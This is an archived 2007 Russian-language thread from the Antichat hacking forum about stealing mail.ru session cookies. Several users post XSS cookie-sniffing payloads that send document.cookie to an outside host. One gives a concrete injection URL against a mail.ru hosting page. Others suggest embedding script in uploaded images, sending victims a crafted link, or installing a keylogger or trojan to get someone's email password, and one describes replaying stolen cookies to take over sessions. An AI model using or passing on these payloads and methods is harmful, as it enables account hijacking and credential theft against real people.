ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
22.05.2007, 02:34
|
|
Новичок
Регистрация: 21.05.2007
Сообщений: 10
Провел на форуме:
11295
Репутация:
3
|
|
Сообщение от ultimatum
ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,
Ага, ссылка на сни должна быть на mail.ru, например в письме, но почта фильтрует подобные ссылки.. я слышал можно закодировать ссылка со криптом както... это так? кто знает?
|
|
|
22.05.2007, 02:37
|
|
Новичок
Регистрация: 21.05.2007
Сообщений: 10
Провел на форуме:
11295
Репутация:
3
|
|
Сообщение от nc.STRIEM
просто код вот:
Код:
<script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script>
естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи!
Но всеже в привате существуют рабочие XSS, но просто так тебе их никто не даст.
Разве что за $ Вот именно что обычный код не пройдёт, система его забанит, вот и создал эту тему чтоб узнать рабочий код XSS под сниф для mail.ru естественно не за деньги.. за деньги можно всё купить.. а вот чтоб своими мозгам.. у меня покачто мозгов для этого нехватает видимо, поэтому и спрашиваю у людей. )) 
|
|
|
|
22.05.2007, 02:42
|
|
Новичок
Регистрация: 21.05.2007
Сообщений: 10
Провел на форуме:
11295
Репутация:
3
|
|
А можно обычный код
Код:
<script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script>
встроить в gif или jpeg ведь на mail.ru можно к своему аккаунту прикреплять фоты, можно как нить в фотку встроить этот код? а потом написать письмо жертве на ссылку этой картинки, или саму картинку, тогда код будет на целевой системе и всё будет гууд) Вот только можно так сделать??????  |
|
|
|
22.05.2007, 02:53
|
|
Новичок
Регистрация: 21.05.2007
Сообщений: 10
Провел на форуме:
11295
Репутация:
3
|
|
нда... весь прикол в том что выложенные Xss почти все уже не работают..(((  |
|
|
|
22.05.2007, 08:22
|
|
Постоянный
Регистрация: 24.02.2007
Сообщений: 446
Провел на форуме:
1035728
Репутация:
316
|
|
Сообщение от cigaretteburn
нда... весь прикол в том что выложенные Xss почти все уже не работают..((( Неработает одно, работает другое... Нужно мыло Чела? пихни ему кейлогер, узнаешь не только пасс от его мыла...
Да знаю - легко сказать. И тем немение троян работает!
Ещё много дебилов, чьи антивиры пропускают старые трояны, вирусы, кейлогеры... В пример могу взять свой университет - стадо тупых носорогов сидящих за компами...
|
|
|
|
22.05.2007, 11:51
|
|
Новичок
Регистрация: 21.05.2007
Сообщений: 10
Провел на форуме:
11295
Репутация:
3
|
|
Сообщение от xhttp
Неработает одно, работает другое... Нужно мыло Чела? пихни ему кейлогер, узнаешь не только пасс от его мыла...
Да знаю - легко сказать. И тем немение троян работает!
Ещё много дебилов, чьи антивиры пропускают старые трояны, вирусы, кейлогеры... В пример могу взять свой университет - стадо тупых носорогов сидящих за компами...
Хм.. хорошая идея но всё же если кто что может сказать полезного насчёт снифа - пишите. А насчёт кейлогера - дайте ссылку на хороший без лагов, а то их тоже не мало в сети.. А насчёт универа - у меня также вгруппе стадо придурков) 
|
|
|
|
22.05.2007, 11:56
|
|
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
Провел на форуме:
11338585
Репутация:
441
|
|
Сообщение от cigaretteburn
нда... весь прикол в том что выложенные Xss почти все уже не работают..((( как не работают??? вот тебе пример...
Код:
http://hosting.mail.ru/selectLoginForConstructor.jsp?constructor="><script>navigate('http://site.ru/s.gif?'.concat(document.cookie))</script>
///при этом можно открыть гифку ..и вписать туда переадресацию.....чтобы палевно не было...
Сообщение от cigaretteburn
встроить в gif или jpeg ведь на mail.ru можно к своему аккаунту прикреплять фоты, можно как нить в фотку встроить этот код? а потом написать письмо жертве на ссылку этой картинки, или саму картинку, тогда код будет на целевой системе и всё будет гууд) Вот только можно так сделать??????
Можно встроить в png .... в конец записать ...и в фоту на маил ру ..и то будет работать только в IE ...вот тут почитай
|
|
|
|
25.05.2007, 18:06
|
|
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850
Репутация:
536
|
|
Сообщение от cigaretteburn
Как это толку? в опере меняеш куки и всё..
На мэйле привязка к IP адресу идет...
|
|
|
|
02.06.2007, 22:00
|
|
Участник форума
Регистрация: 08.05.2007
Сообщений: 100
Провел на форуме:
454835
Репутация:
28
|
|
Сообщение от Naf
а что толку от куков? они пароли не дают.
у меня есть папка с универа (все куки забрал...
ничего интересного, кроме адресов посещения, жж и блогов.
Конечно толку не будет если ты их не попробуешь в свой браузер вбить куки.А может случиться великое чудо ? %) и появиться надпись здраствуйте такой такой то ))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
